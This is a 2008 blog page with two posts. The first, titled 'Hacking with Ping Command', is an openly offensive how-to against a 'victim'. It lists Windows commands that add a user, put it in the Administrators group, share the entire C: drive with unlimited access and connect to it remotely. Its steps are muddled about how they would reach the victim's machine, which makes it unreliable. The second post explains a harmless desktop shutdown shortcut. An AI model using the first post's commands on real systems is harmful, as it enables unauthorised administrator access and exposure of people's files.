Showing posts with label drive. Show all posts
Showing posts with label drive. Show all posts

Saturday, December 6, 2008

Hacking with Ping Command

1) Ping command

a cool way to say hello to victim

try

ping [victims ip goes here]

if the result is request timed out then the user is ofline

if the result is reply from [ip] bytes=32 time<1ms TTL 64

the victim is online.



2)net user [anyname] /add

it adds a new net user put any name inplace of [anyname]



3)net localgroup administrators [anyname] /add

This is the command that make your user go to the administrators

group.

Depending on the windows version the name will be different.

If you got an american version the name for the group is Administrators

and for the portuguese version is administradores so it's nice

yo know wich version of windows xp you are going to try share.



4)net share system=C:\ /unlimited

This commands share the C: drive with the name of system.

you can use any root dir. instead



5)net use \\victimip [nameofnetaccount]

This command will make a session between you and the victim

Of course where it says victimip you will insert the victim ip.

where nameofnetuser is the name via which victim logs on



6)explorer \\victimip\system

And this will open a explorer windows in the share system wich is

the C: drive with administrators access!

Thursday, September 11, 2008

Create Shutdown Icon

Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up

window instructing you to enter a command line path.
Use this path in "Type Location of the Item"
SHUTDOWN -s -t 01
If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and

click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you're done